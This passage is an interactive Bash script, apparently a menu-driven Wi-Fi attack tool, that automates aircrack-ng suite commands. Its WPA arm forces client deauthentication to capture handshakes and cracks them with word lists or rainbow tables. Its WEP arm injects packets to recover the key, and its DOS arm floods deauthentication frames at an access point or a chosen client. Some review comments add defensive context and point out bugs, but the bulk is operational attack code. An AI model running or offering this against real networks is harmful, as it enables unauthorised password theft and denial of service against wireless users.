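\e[1;31m[!]\e[0m Not a valid wireless device. Please try again."
      sleep 3
    fi
  done
  echo -e "
All done!!! Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu.
"
  ;;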
############### Start WPA
"WPA")
ncard=1
while [[ $ncard == 1 ]] ; do
clear
echo -e
ifconfig | grep wlan
echo -e "
\e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0]
"
read card
if [[ $card == "" ]] ; then
card=wlan0
fi
if [[ $card == wlan* ]] ; then
clear
ncard=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid wireless device. Please try again."
sleep 3
fi
done
clear
airmon-ng start $card >>.trash.txt
echo -e "
\e[1;34m[*]\e[0m New tabs will open running various commands to gather info. Come back to this tab to input data.
"
sleep 5
konsole --new-tab -e airodump-ng mon0 2>>.trash.txt
qnet=1
while [[ $qnet == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the name of the network you want to target?
"
read net
if [[ $net == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $net == * ]] ; then
clear
qnet=0
fi
done
qone=1
while [[ $qone == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the BSSID of the network you want to target?
"
read bssid
if [[ $bssid == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $bssid == * ]] ; then
clear
qone=0
fi
done
qtwo=1
while [[ $qtwo == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What channel is the network on?
"
read chan
if [[ $chan == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $chan == * ]] ; then
clear
qtwo=0
fi
done
qthree=1
while [[ $qthree == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What do you want to name the capture file?
"
read name
if [[ $name == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $name == * ]] ; then
qthree=0
fi
done
clear
echo -e "
\e[1;34m[*]\e[0m You now have 10 seconds to close the previousely opened tab. GO!
"
sleep 10
clear
howonetwo=1
while [[ $howonetwo == 1 ]] ; do
clear
echo -e "
\e[1;34m[*]\e[0m How do you plan on cracking the capture file? [1|2]
1) With pre-computed rainbow tables.
2) Wth a dictionary file or word-list.
"
read how
if [[ $how == "1" ]] ; then
konsole --new-tab -e airodump-ng -c $chan -w $name --bssid $bssid mon0 2>>.trash.txt
howonetwo=0
elif [[ $how == "2" ]] ; then
konsole --new-tab -e airodump-ng -c $chan -w $name --bssid $bssid --ivs mon0 2>>.trash.txt
howonetwo=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid operation. Please try again.
"
sleep 3
fi
done
clear
echo -e "
\e[1;34m[*]\e[0m OK, lets try and deauthenticate a client to get the handshake. What is the station ID?
"
read client
handyn=1
while [[ $handyn == 1 ]] ; do
echo -e
aireplay-ng -0 10 -a $bssid -c $client mon0
echo -e "
\e[1;34m[*]\e[0m Look in the window that was opened a minute ago and see if the handshake appeared at the top.
"
echo -e "
\e[1;34m[*]\e[0m Did the handshake appear? [y|n|new]
"
read hand
if [[ $hand == y ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m OK, time to crack the capture file!
"
sleep 3
handyn=0
elif [[ $hand == n ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m OK, lets try again. If you do not recieve a handshake after a few more tries you can type [new] to deauthenticate a different client or you can press \e[1;31mCtrl+C\e[0m to go back to the main menu.
"
sleep 5
clear
elif [[ $hand == new ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m OK, lets try and deauthenticate a client to get the handshake. What is the station ID?
"
read client
else
clear
echo -e "
\e[1;31m[!]\e[0m Invalid operation. Please try again.
"
fi
done
if [[ $how == 1 ]] ; then
where=1
while [[ $where == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the absolute path to the rainbow tables you will be using? (You may drag-n-drop the file to populate, but do not leave trailing spaces!)
"
read rt
if [[ $rt == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m Invalid file path. Please try again.
"
else
clear
where=0
fi
done
cowpatty –s $net –d $rt –r ~/$name-01.cap || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
elif [[ $how == 2 ]] ; then
what=1
while [[ $what == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the absolute path to the dictionary or word-list you want to use? (You may drag-n-drop the file to populate, but do not leave trailing spaces!)
"
read word
if [[ $word == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m Invalid file path. Please try again.
"
else
clear
what=0
fi
done
aircrack-ng -l ~/cracked-password.txt -w $word ~/$name-01.ivs || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
fi
echo -e "
\e[1;32mAll Done!!!\e[0m - If you used a dictionary or word-list and your passphrase was found then it was saved to cracked-password.txt in your home directory. If you used rainbow tables and your passphrase was found it is listed above so take the time to record it now.
Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu.
"
;;
##################### Start WEP
# WEP arm: interactive walk-through that puts a wireless card into monitor
# mode, records traffic for one BSSID/channel with airodump-ng, opens two
# aireplay-ng tabs, and finally runs aircrack-ng on the capture file.
# Defensive context: WEP is long deprecated; an access point that still
# offers it should be migrated to WPA2 or WPA3.
# NOTE(review): every value read from the operator below ($card, $bssid,
# $chan, $name) is expanded unquoted into command lines, so whitespace or
# glob characters in a reply are word-split and expanded by the shell.
"WEP")
ncard=1
# Ask for the interface until the reply starts with "wlan"; an empty reply
# defaults to wlan0.
while [[ $ncard == 1 ]] ; do
clear
echo -e
ifconfig | grep wlan
echo -e "
\e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0]
"
read card
if [[ $card == "" ]] ; then
card=wlan0
fi
if [[ $card == wlan* ]] ; then
clear
ncard=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid wireless device. Please try again."
sleep 3
fi
done
clear
# airmon-ng's output is appended to .trash.txt in the current directory and
# never read back; the monitor interface name mon0 is hard-coded from here on.
airmon-ng start $card >>.trash.txt
echo -e "
\e[1;34m[*]\e[0m New tabs will open running various commands to gather info. Come back to this tab to input data.
"
sleep 5
konsole --new-tab -e airodump-ng mon0 2>>.trash.txt
qone=1
# The three prompt loops below only reject an empty reply: [[ $x == * ]]
# matches any non-empty string, so BSSID, channel and file name are not
# checked for format before they reach the command lines further down.
while [[ $qone == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the BSSID of the network you want to target?
"
read bssid
if [[ $bssid == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $bssid == * ]] ; then
clear
qone=0
fi
done
qtwo=1
while [[ $qtwo == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What channel is the network on?
"
read chan
if [[ $chan == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $chan == * ]] ; then
clear
qtwo=0
fi
done
qthree=1
while [[ $qthree == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What do you want to name the capture file?
"
read name
if [[ $name == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $name == * ]] ; then
qthree=0
fi
done
clear
echo -e "
\e[1;34m[*]\e[0m You now have 10 seconds to close the previousely opened tab. GO!
"
sleep 10
clear
# Capture restricted to the chosen channel and BSSID; -w $name is a relative
# prefix, while aircrack-ng below reads ~/$name-01.cap — presumably the script
# is expected to be started from the home directory (TODO confirm).
konsole --new-tab -e airodump-ng -c $chan -w $name --bssid $bssid mon0 2>>.trash.txt
echo -e "
\e[1;34m[*]\e[0m OK, now starting WEP attack?
"
# Two further tabs run aireplay-ng in its -1 and -3 modes against $bssid.
# Both transmit frames, so this stage is active and shows up in wireless
# intrusion-detection logs, unlike the passive capture above.
konsole --new-tab -e aireplay-ng -1 0 -a $bssid mon0
clear
konsole --new-tab -e aireplay-ng -3 -b $bssid mon0
echo -e "
\e[1;34m[*]\e[0m Wait a minute or two and watch the data rise in the first window that initially opened.
"
sleep 3
dat=1
# Loop until the operator answers y.
# NOTE(review): the second test reads $hand, not $data; this arm never sets
# hand, so a reply of n normally lands in the "Invalid operation" branch.
while [[ $dat == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m Has the data risen to over 5K? [y|n]
"
read data
if [[ $data == y ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m OK, time to crack the capture file!
"
sleep 3
dat=0
elif [[ $hand == n ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m OK, lets try again. You can press \e[1;31mCtrl+C\e[0m to go back to the main menu.
"
sleep 3
clear
else
clear
echo -e "
\e[1;31m[!]\e[0m Invalid operation. Please try again.
"
fi
done
# -l writes any recovered key in plaintext to ~/cracked-password.txt; a
# non-zero status from aircrack-ng ends the whole script with exit 1.
aircrack-ng -l ~/cracked-password.txt ~/$name-01.cap || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
echo -e "
\e[1;32mAll Done!!!\e[0m - If your passphrase was found then it is shown above and was saved to cracked-password.txt in your home directory.
Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu.
"
;;
############### Start DOS
# DOS arm: asks for an interface, enables monitor mode, then runs
# aireplay-ng -0 (deauthentication) against an access point or one client.
# Defensive context: deauthentication frames are accepted unauthenticated
# unless 802.11w Protected Management Frames is in use (mandatory in WPA3);
# bursts of them are a standard wireless-IDS alert.
# NOTE(review): $card, $bssid and $station are expanded unquoted into the
# command lines below, so replies are word-split and glob-expanded.
"DOS")
ncard=1
# Ask for the interface until the reply starts with "wlan"; an empty reply
# defaults to wlan0.
while [[ $ncard == 1 ]] ; do
clear
echo -e
ifconfig | grep wlan
echo -e "
\e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0]
"
read card
if [[ $card == "" ]] ; then
card=wlan0
fi
if [[ $card == wlan* ]] ; then
clear
ncard=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid wireless device. Please try again."
sleep 3
fi
done
clear
# airmon-ng's output is appended to .trash.txt in the current directory and
# never read back; the monitor interface name mon0 is hard-coded from here on.
airmon-ng start $card >>.trash.txt
echo -e "
\e[1;34m[*]\e[0m New tabs will open running various commands to gather info. Come back to this tab to input data.
"
sleep 5
konsole --new-tab -e airodump-ng mon0 2>>.trash.txt
deny=1
# Choose the mode: 1 = whole access point, 2 = a single client. Any other
# reply is echoed back in the error message and the prompt repeats.
while [[ $deny == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m Who is the victim of this attack? [1|2]
1) Access Point.
2) Connected Client.
"
read who
if [[ $who == "1" ]] ; then
clear
deny=0
elif [[ $who == "2" ]] ; then
clear
deny=0
else
echo -e "
\e[1;31m[!]\e[0m $who is not a valid entry. Please try again.
"
sleep 3
fi
done
if [[ $who == "1" ]] ; then
qone=1
# Access-point branch. [[ $bssid == * ]] accepts any non-empty reply, so the
# BSSID format is not validated.
# NOTE(review): qone is never cleared in this branch, so the prompt repeats
# each time aireplay-ng returns successfully; the loop is left only through
# the exit 1 on failure or an interrupt.
while [[ $qone == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the BSSID of the acces point you want to attack?
"
read bssid
if [[ $bssid == "" ]] ; then
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $bssid == * ]] ; then
echo -e "
\e[1;34m[*]\e[0m OK. Now starting the DOS attack.
"
sleep 3
aireplay-ng -0 9999 -a $bssid mon0 || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
fi
done
else
qtwo=1
# Client branch: collect the BSSID and the client's station ID; both
# prompts only reject an empty reply.
while [[ $qtwo == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the BSSID of the acces point you want to attack?
"
read bssid
if [[ $bssid == "" ]] ; then
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $bssid == * ]] ; then
clear
qtwo=0
fi
done
qthree=1
while [[ $qthree == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the clients station ID?
"
read station
if [[ $station == "" ]] ; then
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $station == * ]] ; then
clear
qthree=0
fi
done
fi
# $station is set only by the client branch above. A non-zero status from
# aireplay-ng ends the whole script with exit 1.
echo -e "
\e[1;34m[*]\e[0m OK. Now starting the DOS attack.
"
sleep 3
aireplay-ng -0 9999 -a $bssid -c $station mon0 || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
;;
###################### Start Main Menu
# break leaves the innermost enclosing loop, which presumably redraws the
# main menu — TODO confirm against the loop header.
"Main Menu")
break
;;
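################### Start Quit
# Quit arm: clears the screen, prints the blinking multi-colour goodbye
# banner and ends the script.
"Quit")
clear
echo -e "
\e[5;31mT\e[5;32mh\e[5;33ma\e[5;34mn\e[5;35mk \e[5;36mY\e[5;37mo\e[5;31mu \e[5;32mF\e[5;33mo\e[5;34mr \e[5;35mU\e[5;36ms\e[5;37mi\e[5;31mn\e[5;31mg \e[5;32mW\e[5;33mi\e[5;34mF\e[5;35mu\e[5;36m!\e[5;37m!\e[5;31m!\e[0m
"
# A user-requested quit is not a failure: report status 0 and keep status 1
# for the "Operation failed!" paths, so a caller can tell the two apart.
exit 0
;;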
# Fallback for a selection that matches none of the arms above: show an
# error, pause three seconds, then break out of the innermost enclosing loop.
*)
echo -e "
\e[1;31m[!]\e[0m Please choose a valid operation..."
sleep 3
break
esac
done
done
I think it is a matter of preference which one is better, but have fun.